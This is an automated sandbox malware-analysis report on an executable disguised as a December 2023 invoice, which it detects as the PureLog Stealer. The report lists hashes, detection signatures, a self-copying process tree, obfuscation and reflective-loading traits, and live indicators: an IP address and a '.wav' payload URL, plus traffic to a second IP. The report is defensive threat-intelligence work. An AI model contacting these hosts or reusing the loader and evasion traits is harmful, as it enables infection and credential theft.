
Windows Analysis Report
invoices---DEC_2023.exe

Overview

General Information

Sample name: invoices---DEC_2023.exe
Analysis ID: 1364951
MD5: 0483a991fb043b8fddcf818ada08b3a1
SHA1: 11f8037e019382be07f2c37210f388553b2a3760
SHA256: 85015ad6ba1de268a69c138776c23e9d1a39a69063d525f74b1ef349b9031ffd
Tags: exe

Detection

PureLog Stealer
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Antivirus detection for dropped file
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Yara detected PureLog Stealer
.NET source code contains method to dynamically call methods (often used by packers)
.NET source code contains potential unpacker
Initial sample is a PE file and has a suspicious name
Injects a PE file into a foreign processes
Machine Learning detection for dropped file
Machine Learning detection for sample
Modifies the context of a thread in another process (thread injection)
Sample has a suspicious name (potential lure to open the executable)
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Yara detected Costura Assembly Loader
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Enables debug privileges
HTTP GET or POST without a user agent
IP address seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file does not import any functions
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • invoices---DEC_2023.exe (PID: 2148 cmdline: C:\Users\user\Desktop\invoices---DEC_2023.exe MD5: 0483A991FB043B8FDDCF818ADA08B3A1)
    • invoices---DEC_2023.exe (PID: 748 cmdline: C:\Users\user\Desktop\invoices---DEC_2023.exe MD5: 0483A991FB043B8FDDCF818ADA08B3A1)
  • fikk.exe (PID: 4448 cmdline: "C:\Users\user\AppData\Roaming\fikk.exe" MD5: 0483A991FB043B8FDDCF818ADA08B3A1)
    • fikk.exe (PID: 1976 cmdline: C:\Users\user\AppData\Roaming\fikk.exe MD5: 0483A991FB043B8FDDCF818ADA08B3A1)
  • fikk.exe (PID: 3372 cmdline: "C:\Users\user\AppData\Roaming\fikk.exe" MD5: 0483A991FB043B8FDDCF818ADA08B3A1)
    • fikk.exe (PID: 3812 cmdline: C:\Users\user\AppData\Roaming\fikk.exe MD5: 0483A991FB043B8FDDCF818ADA08B3A1)
  • cleanup
No configs have been found
Yara matches in memory dumps (Source | Rule | Description | Author):
00000007.00000002.2592378463.000001FED9336000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_CosturaAssemblyLoader | Yara detected Costura Assembly Loader | Joe Security
00000000.00000002.2039823779.000001C122B10000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_CosturaAssemblyLoader | Yara detected Costura Assembly Loader | Joe Security
00000000.00000002.2048259063.000001C127810000.00000004.08000000.00040000.00000000.sdmp | JoeSecurity_CosturaAssemblyLoader | Yara detected Costura Assembly Loader | Joe Security
00000005.00000002.2525528464.000002797BC70000.00000004.08000000.00040000.00000000.sdmp | JoeSecurity_CosturaAssemblyLoader | Yara detected Costura Assembly Loader | Joe Security
00000002.00000002.3249333538.000001EE90856000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_CosturaAssemblyLoader | Yara detected Costura Assembly Loader | Joe Security
(20 entries in the full report; 5 shown)

Yara matches in unpacked PE files (Source | Rule | Description | Author):
7.2.fikk.exe.1fed93365a8.7.raw.unpack | JoeSecurity_CosturaAssemblyLoader | Yara detected Costura Assembly Loader | Joe Security
5.2.fikk.exe.2797bc70000.10.raw.unpack | JoeSecurity_CosturaAssemblyLoader | Yara detected Costura Assembly Loader | Joe Security
2.2.invoices---DEC_2023.exe.1ee908565a8.6.raw.unpack | JoeSecurity_CosturaAssemblyLoader | Yara detected Costura Assembly Loader | Joe Security
5.2.fikk.exe.279108565a8.4.raw.unpack | JoeSecurity_CosturaAssemblyLoader | Yara detected Costura Assembly Loader | Joe Security
0.2.invoices---DEC_2023.exe.1c11eba1b58.4.raw.unpack | JoeSecurity_CosturaAssemblyLoader | Yara detected Costura Assembly Loader | Joe Security
(14 entries in the full report; 5 shown)

No Sigma rule has matched
No Snort rule has matched


AV Detection

Source: invoices---DEC_2023.exe | Avira: detected
Source: http://45.137.22.163/Wowoqku.wav | Avira URL Cloud: Label: malware
Source: http://45.137.22.163 | Avira URL Cloud: Label: malware
Source: C:\Users\user\AppData\Roaming\fikk.exe | Avira: detection malicious, Label: HEUR/AGEN.1360909
Source: http://45.137.22.163/Wowoqku.wav | Virustotal: Detection: 12%
Source: http://45.137.22.163 | Virustotal: Detection: 13%
Source: C:\Users\user\AppData\Roaming\fikk.exe | ReversingLabs: Detection: 18%
Source: C:\Users\user\AppData\Roaming\fikk.exe | Virustotal: Detection: 37%
Source: invoices---DEC_2023.exe | ReversingLabs: Detection: 18%
Source: invoices---DEC_2023.exe | Virustotal: Detection: 37%
Source: C:\Users\user\AppData\Roaming\fikk.exe | Joe Sandbox ML: detected
Source: invoices---DEC_2023.exe | Joe Sandbox ML: detected
Source: invoices---DEC_2023.exe | Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: Binary string: costura.dotnetzip.pdb.compressed | source: invoices---DEC_2023.exe, 00000002.00000002.3243572943.000001EE80001000.00000004.00000800.00020000.00000000.sdmp, invoices---DEC_2023.exe, 00000002.00000002.3249333538.000001EE90856000.00000004.00000800.00020000.00000000.sdmp, fikk.exe, 00000005.00000002.2511602813.00000279106B9000.00000004.00000800.00020000.00000000.sdmp, fikk.exe, 00000005.00000002.2508019011.0000027900001000.00000004.00000800.00020000.00000000.sdmp, fikk.exe, 00000007.00000002.2592378463.000001FED9336000.00000004.00000800.00020000.00000000.sdmp, fikk.exe, 00000007.00000002.2586831322.000001FEC8B29000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: costura.dotnetzip.pdb.compressed | source: invoices---DEC_2023.exe, 00000002.00000002.3243572943.000001EE80001000.00000004.00000800.00020000.00000000.sdmp, fikk.exe, 00000005.00000002.2508019011.0000027900001000.00000004.00000800.00020000.00000000.sdmp, fikk.exe, 00000007.00000002.2586831322.000001FEC8B29000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: costura.dotnetzip.pdb.compressed2! | source: invoices---DEC_2023.exe, 00000002.00000002.3243572943.000001EE80001000.00000004.00000800.00020000.00000000.sdmp, fikk.exe, 00000005.00000002.2508019011.0000027900001000.00000004.00000800.00020000.00000000.sdmp, fikk.exe, 00000007.00000002.2586831322.000001FEC8B29000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: 37d4c34f-a7fd-478e-84fe-ac246c9c46bb<Module>costura.costura.dll.compressedcostura.dotnetzip.dll.compressedcostura.dotnetzip.pdb.compressedcostura.protobuf-net.dll.compressedFoytgem.g.resourcesaR3nbf8dQp2feLmk31.lSfgApatkdxsVcGcrktoFd.resources | source: invoices---DEC_2023.exe, 00000002.00000002.3249333538.000001EE90856000.00000004.00000800.00020000.00000000.sdmp, fikk.exe, 00000005.00000002.2511602813.00000279106B9000.00000004.00000800.00020000.00000000.sdmp, fikk.exe, 00000007.00000002.2592378463.000001FED9336000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: @costura.dotnetzip.pdb.compressed | source: invoices---DEC_2023.exe, 00000002.00000002.3243572943.000001EE80001000.00000004.00000800.00020000.00000000.sdmp, fikk.exe, 00000005.00000002.2508019011.0000027900001000.00000004.00000800.00020000.00000000.sdmp, fikk.exe, 00000007.00000002.2586831322.000001FEC8B29000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: protobuf-net.pdbSHA256}Lq | source: invoices---DEC_2023.exe, 00000000.00000002.2038776044.000001C10EAE9000.00000004.00000800.00020000.00000000.sdmp, invoices---DEC_2023.exe, 00000000.00000002.2048782210.000001C127910000.00000004.08000000.00040000.00000000.sdmp, invoices---DEC_2023.exe, 00000000.00000002.2039823779.000001C122B10000.00000004.00000800.00020000.00000000.sdmp, invoices---DEC_2023.exe, 00000002.00000002.3243572943.000001EE80001000.00000004.00000800.00020000.00000000.sdmp, fikk.exe, 00000003.00000002.2199934431.000002A4C80AF000.00000004.00000800.00020000.00000000.sdmp, fikk.exe, 00000005.00000002.2511602813.00000279106B9000.00000004.00000800.00020000.00000000.sdmp, fikk.exe, 00000005.00000002.2508019011.0000027900001000.00000004.00000800.00020000.00000000.sdmp, fikk.exe, 00000005.00000002.2511602813.0000027910968000.00000004.00000800.00020000.00000000.sdmp, fikk.exe, 00000006.00000002.2279392532.000001D909937000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: protobuf-net.pdb | source: invoices---DEC_2023.exe, 00000000.00000002.2038776044.000001C10EAE9000.00000004.00000800.00020000.00000000.sdmp, invoices---DEC_2023.exe, 00000000.00000002.2048782210.000001C127910000.00000004.08000000.00040000.00000000.sdmp, invoices---DEC_2023.exe, 00000000.00000002.2039823779.000001C122B10000.00000004.00000800.00020000.00000000.sdmp, invoices---DEC_2023.exe, 00000002.00000002.3243572943.000001EE80001000.00000004.00000800.00020000.00000000.sdmp, fikk.exe, 00000003.00000002.2199934431.000002A4C80AF000.00000004.00000800.00020000.00000000.sdmp, fikk.exe, 00000005.00000002.2511602813.00000279106B9000.00000004.00000800.00020000.00000000.sdmp, fikk.exe, 00000005.00000002.2508019011.0000027900001000.00000004.00000800.00020000.00000000.sdmp, fikk.exe, 00000005.00000002.2511602813.0000027910968000.00000004.00000800.00020000.00000000.sdmp, fikk.exe, 00000006.00000002.2279392532.000001D909937000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: Foytgem.pdb | source: invoices---DEC_2023.exe, 00000002.00000002.3249333538.000001EE907BC000.00000004.00000800.00020000.00000000.sdmp, fikk.exe, 00000005.00000002.2511602813.00000279106B9000.00000004.00000800.00020000.00000000.sdmp, fikk.exe, 00000005.00000002.2511602813.00000279102E1000.00000004.00000800.00020000.00000000.sdmp, fikk.exe, 00000007.00000002.2592378463.000001FED929C000.00000004.00000800.00020000.00000000.sdmp
Source: global traffic | TCP traffic: 192.168.2.5:49705 -> 5.252.165.214:8088
Source: global traffic | HTTP traffic detected: GET /Wowoqku.wav HTTP/1.1; Host: 45.137.22.163; Connection: Keep-Alive (this request is listed 6 times in the report)
Source: Joe Sandbox View | IP Address: 45.137.22.163 45.137.22.163 (listed twice in the report)
Source: unknown | TCP traffic detected without corresponding DNS query: 45.137.22.163 (listed 50 times in the report)
Source: invoices---DEC_2023.exe, fikk.exe.0.dr | String found in binary or memory: http://127.0.0.1:
Source: invoices---DEC_2023.exe, 00000000.00000002.2038776044.000001C10E9B1000.00000004.00000800.00020000.00000000.sdmp, fikk.exe, 00000003.00000002.2199934431.000002A4C7F71000.00000004.00000800.00020000.00000000.sdmp, fikk.exe, 00000006.00000002.2279392532.000001D909810000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://45.137.22.163
Source: invoices---DEC_2023.exe, fikk.exe.0.dr | String found in binary or memory: http://45.137.22.163/Wowoqku.wav
Source: invoices---DEC_2023.exe, 00000000.00000002.2038776044.000001C10E9B1000.00000004.00000800.00020000.00000000.sdmp, fikk.exe, 00000003.00000002.2199934431.000002A4C7F71000.00000004.00000800.00020000.00000000.sdmp, fikk.exe, 00000006.00000002.2279392532.000001D909810000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: invoices---DEC_2023.exe, 00000000.00000002.2038776044.000001C10EAE9000.00000004.00000800.00020000.00000000.sdmp, invoices---DEC_2023.exe, 00000000.00000002.2048782210.000001C127910000.00000004.08000000.00040000.00000000.sdmp, invoices---DEC_2023.exe, 00000000.00000002.2039823779.000001C122B10000.00000004.00000800.00020000.00000000.sdmp, invoices---DEC_2023.exe, 00000002.00000002.3243572943.000001EE80001000.00000004.00000800.00020000.00000000.sdmp, fikk.exe, 00000003.00000002.2199934431.000002A4C80AF000.00000004.00000800.00020000.00000000.sdmp, fikk.exe, 00000005.00000002.2511602813.00000279106B9000.00000004.00000800.00020000.00000000.sdmp, fikk.exe, 00000005.00000002.2508019011.0000027900001000.00000004.00000800.00020000.00000000.sdmp, fikk.exe, 00000005.00000002.2511602813.0000027910968000.00000004.00000800.00020000.00000000.sdmp, fikk.exe, 00000006.00000002.2279392532.000001D909937000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://github.com/mgravell/protobuf-net
Source: invoices---DEC_2023.exe, 00000000.00000002.2038776044.000001C10EAE9000.00000004.00000800.00020000.00000000.sdmp, invoices---DEC_2023.exe, 00000000.00000002.2048782210.000001C127910000.00000004.08000000.00040000.00000000.sdmp, invoices---DEC_2023.exe, 00000000.00000002.2039823779.000001C122B10000.00000004.00000800.00020000.00000000.sdmp, invoices---DEC_2023.exe, 00000002.00000002.3243572943.000001EE80001000.00000004.00000800.00020000.00000000.sdmp, fikk.exe, 00000003.00000002.2204458886.000002A4DC281000.00000004.00000800.00020000.00000000.sdmp, fikk.exe, 00000003.00000002.2199934431.000002A4C80AF000.00000004.00000800.00020000.00000000.sdmp, fikk.exe, 00000005.00000002.2511602813.00000279106B9000.00000004.00000800.00020000.00000000.sdmp, fikk.exe, 00000005.00000002.2508019011.0000027900001000.00000004.00000800.00020000.00000000.sdmp, fikk.exe, 00000005.00000002.2511602813.0000027910968000.00000004.00000800.00020000.00000000.sdmp, fikk.exe, 00000006.00000002.2283674148.000001D91DB11000.00000004.00000800.00020000.00000000.sdmp, fikk.exe, 00000006.00000002.2279392532.000001D909937000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://github.com/mgravell/protobuf-netJ
Source: invoices---DEC_2023.exe, 00000000.00000002.2038776044.000001C10EAE9000.00000004.00000800.00020000.00000000.sdmp, invoices---DEC_2023.exe, 00000000.00000002.2048782210.000001C127910000.00000004.08000000.00040000.00000000.sdmp, invoices---DEC_2023.exe, 00000000.00000002.2039823779.000001C122B10000.00000004.00000800.00020000.00000000.sdmp, invoices---DEC_2023.exe, 00000002.00000002.3243572943.000001EE80001000.00000004.00000800.00020000.00000000.sdmp, fikk.exe, 00000003.00000002.2199934431.000002A4C80AF000.00000004.00000800.00020000.00000000.sdmp, fikk.exe, 00000005.00000002.2511602813.00000279106B9000.00000004.00000800.00020000.00000000.sdmp, fikk.exe, 00000005.00000002.2508019011.0000027900001000.00000004.00000800.00020000.00000000.sdmp, fikk.exe, 00000005.00000002.2511602813.0000027910968000.00000004.00000800.00020000.00000000.sdmp, fikk.exe, 00000006.00000002.2279392532.000001D909937000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://github.com/mgravell/protobuf-neti
Source: invoices---DEC_2023.exe, 00000000.00000002.2038776044.000001C10EAE9000.00000004.00000800.00020000.00000000.sdmp, invoices---DEC_2023.exe, 00000000.00000002.2048782210.000001C127910000.00000004.08000000.00040000.00000000.sdmp, invoices---DEC_2023.exe, 00000000.00000002.2039823779.000001C122B10000.00000004.00000800.00020000.00000000.sdmp, invoices---DEC_2023.exe, 00000002.00000002.3243572943.000001EE80001000.00000004.00000800.00020000.00000000.sdmp, fikk.exe, 00000003.00000002.2199934431.000002A4C80AF000.00000004.00000800.00020000.00000000.sdmp, fikk.exe, 00000005.00000002.2511602813.00000279106B9000.00000004.00000800.00020000.00000000.sdmp, fikk.exe, 00000005.00000002.2508019011.0000027900001000.00000004.00000800.00020000.00000000.sdmp, fikk.exe, 00000005.00000002.2511602813.0000027910968000.00000004.00000800.00020000.00000000.sdmp, fikk.exe, 00000006.00000002.2279392532.000001D909937000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://stackoverflow.com/q/11564914/23354;
Source: fikk.exe, 00000006.00000002.2279392532.000001D909937000.00000004.00000800.00020000.00000000.sdmp, fikk.exe, 00000007.00000002.2586831322.000001FEC8BFB000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://stackoverflow.com/q/14436606/23354
Source: invoices---DEC_2023.exe, 00000000.00000002.2048782210.000001C127910000.00000004.08000000.00040000.00000000.sdmp, invoices---DEC_2023.exe, 00000000.00000002.2039823779.000001C122B10000.00000004.00000800.00020000.00000000.sdmp, fikk.exe, 00000005.00000002.2511602813.00000279106B9000.00000004.00000800.00020000.00000000.sdmp, fikk.exe, 00000005.00000002.2511602813.0000027910968000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://stackoverflow.com/q/2152978/23354

System Summary

Source: initial sample | Static PE information: Filename: invoices---DEC_2023.exe
Source: invoices---DEC_2023.exe | Static file information: Suspicious name
Source: C:\Users\user\Desktop\invoices---DEC_2023.exe | Code function: 0_2_00007FF848F148DE
Source: C:\Users\user\Desktop\invoices---DEC_2023.exe | Code function: 2_2_00007FF848FF1E2E
Source: C:\Users\user\AppData\Roaming\fikk.exe | Code function: 3_2_00007FF848F448DE
Source: C:\Users\user\AppData\Roaming\fikk.exe | Code function: 5_2_00007FF848FE1B44
Source: C:\Users\user\AppData\Roaming\fikk.exe | Code function: 6_2_00007FF848F5F380
Source: C:\Users\user\AppData\Roaming\fikk.exe | Code function: 7_2_00007FF848F3D2F3
Source: C:\Users\user\AppData\Roaming\fikk.exe | Code function: 7_2_00007FF848F3D1F3
Source: C:\Users\user\AppData\Roaming\fikk.exe | Code function: 7_2_00007FF848F3D4D3
Source: C:\Users\user\AppData\Roaming\fikk.exe | Code function: 7_2_00007FF848F3D0E3
Source: fikk.exe.0.dr | Static PE information: No import functions for PE file found
Source: invoices---DEC_2023.exe | Static PE information: No import functions for PE file found
Source: invoices---DEC_2023.exe, 00000000.00000002.2038776044.000001C10EAE9000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameprotobuf-net.dllJ vs invoices---DEC_2023.exe
Source: invoices---DEC_2023.exe, 00000000.00000002.2038776044.000001C10EAE9000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameKsdrzconmz.exe" vs invoices---DEC_2023.exe
Source: invoices---DEC_2023.exe, 00000000.00000000.1992325575.000001C10CC9C000.00000002.00000001.01000000.00000003.sdmp | Binary or memory string: OriginalFilenameliol.exe" vs invoices---DEC_2023.exe
Source: invoices---DEC_2023.exe, 00000000.00000002.2048782210.000001C127910000.00000004.08000000.00040000.00000000.sdmp | Binary or memory string: OriginalFilenameprotobuf-net.dllJ vs invoices---DEC_2023.exe
Source: invoices---DEC_2023.exe, 00000000.00000002.2039823779.000001C122B10000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameprotobuf-net.dllJ vs invoices---DEC_2023.exe
Source: invoices---DEC_2023.exe, 00000002.00000002.3243572943.000001EE80001000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameprotobuf-net.dllJ vs invoices---DEC_2023.exe
Source: invoices---DEC_2023.exe, 00000002.00000002.3249333538.000001EE907BC000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameFoytgem.dll" vs invoices---DEC_2023.exe
Source: invoices---DEC_2023.exe | Binary or memory string: OriginalFilenameliol.exe" vs invoices---DEC_2023.exe
Source: 0.2.invoices---DEC_2023.exe.1c11eba1b58.3.raw.unpack, DispatcherAttrInstance.cs | Cryptographic APIs: 'CreateDecryptor' (listed 3 times in the report)
Source: 0.2.invoices---DEC_2023.exe.1c11eba1b58.3.raw.unpack, StubClientConfig.cs | Task registration methods: 'CreateTask'
Source: 0.2.invoices---DEC_2023.exe.1c11eba1b58.3.raw.unpack, Collection.cs | Task registration methods: 'RegisterTask'
Source: classification engine | Classification label: mal100.troj.evad.winEXE@9/4@0/2
Source: C:\Users\user\Desktop\invoices---DEC_2023.exe | File created: C:\Users\user\AppData\Roaming\fikk.exe
Source: C:\Users\user\Desktop\invoices---DEC_2023.exe | Mutant created: \Sessions\1\BaseNamedObjects\5bec48dd15fbca32
Source: invoices---DEC_2023.exe | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: invoices---DEC_2023.exe | Static file information: TRID: Win64 Executable GUI Net Framework (217006/5) 49.88%
Source: C:\Users\user\Desktop\invoices---DEC_2023.exe | Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\b8493bec853ac702d2188091d76ccffa\mscorlib.ni.dll (listed twice in the report)
Source: C:\Users\user\AppData\Roaming\fikk.exe | Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\b8493bec853ac702d2188091d76ccffa\mscorlib.ni.dll (listed 4 times in the report)
Source: C:\Users\user\Desktop\invoices---DEC_2023.exe | Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: invoices---DEC_2023.exe | ReversingLabs: Detection: 18%
Source: invoices---DEC_2023.exe | Virustotal: Detection: 37%
Source: C:\Users\user\Desktop\invoices---DEC_2023.exe | File read: C:\Users\user\Desktop\invoices---DEC_2023.exe
Source: unknown | Process created: C:\Users\user\Desktop\invoices---DEC_2023.exe C:\Users\user\Desktop\invoices---DEC_2023.exe
Source: C:\Users\user\Desktop\invoices---DEC_2023.exe | Process created: C:\Users\user\Desktop\invoices---DEC_2023.exe C:\Users\user\Desktop\invoices---DEC_2023.exe
Source: unknown | Process created: C:\Users\user\AppData\Roaming\fikk.exe "C:\Users\user\AppData\Roaming\fikk.exe"
Source: C:\Users\user\AppData\Roaming\fikk.exe | Process created: C:\Users\user\AppData\Roaming\fikk.exe C:\Users\user\AppData\Roaming\fikk.exe
Source: unknown | Process created: C:\Users\user\AppData\Roaming\fikk.exe "C:\Users\user\AppData\Roaming\fikk.exe"
Source: C:\Users\user\AppData\Roaming\fikk.exe | Process created: C:\Users\user\AppData\Roaming\fikk.exe C:\Users\user\AppData\Roaming\fikk.exe
Source: C:\Users\user\Desktop\invoices---DEC_2023.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32
Source: C:\Users\user\Desktop\invoices---DEC_2023.exe | File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll
Source: invoices---DEC_2023.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                      Source: invoices---DEC_2023.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                      Source: Binary string: costura.dotnetzip.pdb.compressed source: invoices---DEC_2023.exe, 00000002.00000002.3243572943.000001EE80001000.00000004.00000800.00020000.00000000.sdmp, invoices---DEC_2023.exe, 00000002.00000002.3249333538.000001EE90856000.00000004.00000800.00020000.00000000.sdmp, fikk.exe, 00000005.00000002.2511602813.00000279106B9000.00000004.00000800.00020000.00000000.sdmp, fikk.exe, 00000005.00000002.2508019011.0000027900001000.00000004.00000800.00020000.00000000.sdmp, fikk.exe, 00000007.00000002.2592378463.000001FED9336000.00000004.00000800.00020000.00000000.sdmp, fikk.exe, 00000007.00000002.2586831322.000001FEC8B29000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: costura.dotnetzip.pdb.compressed source: invoices---DEC_2023.exe, 00000002.00000002.3243572943.000001EE80001000.00000004.00000800.00020000.00000000.sdmp, fikk.exe, 00000005.00000002.2508019011.0000027900001000.00000004.00000800.00020000.00000000.sdmp, fikk.exe, 00000007.00000002.2586831322.000001FEC8B29000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: costura.dotnetzip.pdb.compressed2! source: invoices---DEC_2023.exe, 00000002.00000002.3243572943.000001EE80001000.00000004.00000800.00020000.00000000.sdmp, fikk.exe, 00000005.00000002.2508019011.0000027900001000.00000004.00000800.00020000.00000000.sdmp, fikk.exe, 00000007.00000002.2586831322.000001FEC8B29000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: 37d4c34f-a7fd-478e-84fe-ac246c9c46bb<Module>costura.costura.dll.compressedcostura.dotnetzip.dll.compressedcostura.dotnetzip.pdb.compressedcostura.protobuf-net.dll.compressedFoytgem.g.resourcesaR3nbf8dQp2feLmk31.lSfgApatkdxsVcGcrktoFd.resources source: invoices---DEC_2023.exe, 00000002.00000002.3249333538.000001EE90856000.00000004.00000800.00020000.00000000.sdmp, fikk.exe, 00000005.00000002.2511602813.00000279106B9000.00000004.00000800.00020000.00000000.sdmp, fikk.exe, 00000007.00000002.2592378463.000001FED9336000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: @costura.dotnetzip.pdb.compressed source: invoices---DEC_2023.exe, 00000002.00000002.3243572943.000001EE80001000.00000004.00000800.00020000.00000000.sdmp, fikk.exe, 00000005.00000002.2508019011.0000027900001000.00000004.00000800.00020000.00000000.sdmp, fikk.exe, 00000007.00000002.2586831322.000001FEC8B29000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: protobuf-net.pdbSHA256}Lq source: invoices---DEC_2023.exe, 00000000.00000002.2038776044.000001C10EAE9000.00000004.00000800.00020000.00000000.sdmp, invoices---DEC_2023.exe, 00000000.00000002.2048782210.000001C127910000.00000004.08000000.00040000.00000000.sdmp, invoices---DEC_2023.exe, 00000000.00000002.2039823779.000001C122B10000.00000004.00000800.00020000.00000000.sdmp, invoices---DEC_2023.exe, 00000002.00000002.3243572943.000001EE80001000.00000004.00000800.00020000.00000000.sdmp, fikk.exe, 00000003.00000002.2199934431.000002A4C80AF000.00000004.00000800.00020000.00000000.sdmp, fikk.exe, 00000005.00000002.2511602813.00000279106B9000.00000004.00000800.00020000.00000000.sdmp, fikk.exe, 00000005.00000002.2508019011.0000027900001000.00000004.00000800.00020000.00000000.sdmp, fikk.exe, 00000005.00000002.2511602813.0000027910968000.00000004.00000800.00020000.00000000.sdmp, fikk.exe, 00000006.00000002.2279392532.000001D909937000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: protobuf-net.pdb source: invoices---DEC_2023.exe, 00000000.00000002.2038776044.000001C10EAE9000.00000004.00000800.00020000.00000000.sdmp, invoices---DEC_2023.exe, 00000000.00000002.2048782210.000001C127910000.00000004.08000000.00040000.00000000.sdmp, invoices---DEC_2023.exe, 00000000.00000002.2039823779.000001C122B10000.00000004.00000800.00020000.00000000.sdmp, invoices---DEC_2023.exe, 00000002.00000002.3243572943.000001EE80001000.00000004.00000800.00020000.00000000.sdmp, fikk.exe, 00000003.00000002.2199934431.000002A4C80AF000.00000004.00000800.00020000.00000000.sdmp, fikk.exe, 00000005.00000002.2511602813.00000279106B9000.00000004.00000800.00020000.00000000.sdmp, fikk.exe, 00000005.00000002.2508019011.0000027900001000.00000004.00000800.00020000.00000000.sdmp, fikk.exe, 00000005.00000002.2511602813.0000027910968000.00000004.00000800.00020000.00000000.sdmp, fikk.exe, 00000006.00000002.2279392532.000001D909937000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: Foytgem.pdb source: invoices---DEC_2023.exe, 00000002.00000002.3249333538.000001EE907BC000.00000004.00000800.00020000.00000000.sdmp, fikk.exe, 00000005.00000002.2511602813.00000279106B9000.00000004.00000800.00020000.00000000.sdmp, fikk.exe, 00000005.00000002.2511602813.00000279102E1000.00000004.00000800.00020000.00000000.sdmp, fikk.exe, 00000007.00000002.2592378463.000001FED929C000.00000004.00000800.00020000.00000000.sdmp

                      Data Obfuscation

                      Source: 0.2.invoices---DEC_2023.exe.1c11eba1b58.3.raw.unpack, DispatcherAttrInstance.cs | .Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})
                      Source: invoices---DEC_2023.exe, PrinterMapperWrapper.cs | .Net Code: AddWorker System.Reflection.Assembly.Load(byte[])
                      Source: fikk.exe.0.dr, PrinterMapperWrapper.cs | .Net Code: AddWorker System.Reflection.Assembly.Load(byte[])
                      Source: 0.2.invoices---DEC_2023.exe.1c127910000.13.raw.unpack, TypeModel.cs | .Net Code: TryDeserializeList
                      Source: 0.2.invoices---DEC_2023.exe.1c127910000.13.raw.unpack, ListDecorator.cs | .Net Code: Read
                      Source: 0.2.invoices---DEC_2023.exe.1c127910000.13.raw.unpack, TypeSerializer.cs | .Net Code: CreateInstance
                      Source: 0.2.invoices---DEC_2023.exe.1c127910000.13.raw.unpack, TypeSerializer.cs | .Net Code: EmitCreateInstance
                      Source: 0.2.invoices---DEC_2023.exe.1c127910000.13.raw.unpack, TypeSerializer.cs | .Net Code: EmitCreateIfNull
                      Source: Yara match | File source: 7.2.fikk.exe.1fed93365a8.7.raw.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 5.2.fikk.exe.2797bc70000.10.raw.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 2.2.invoices---DEC_2023.exe.1ee908565a8.6.raw.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 5.2.fikk.exe.279108565a8.4.raw.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 0.2.invoices---DEC_2023.exe.1c122930e38.4.raw.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 0.2.invoices---DEC_2023.exe.1c10ebade48.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 3.2.fikk.exe.2a4c8178370.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 0.2.invoices---DEC_2023.exe.1c1228e0e00.9.raw.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 3.2.fikk.exe.2a4c8178370.0.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 0.2.invoices---DEC_2023.exe.1c1228e0e00.9.unpack, type: UNPACKEDPE
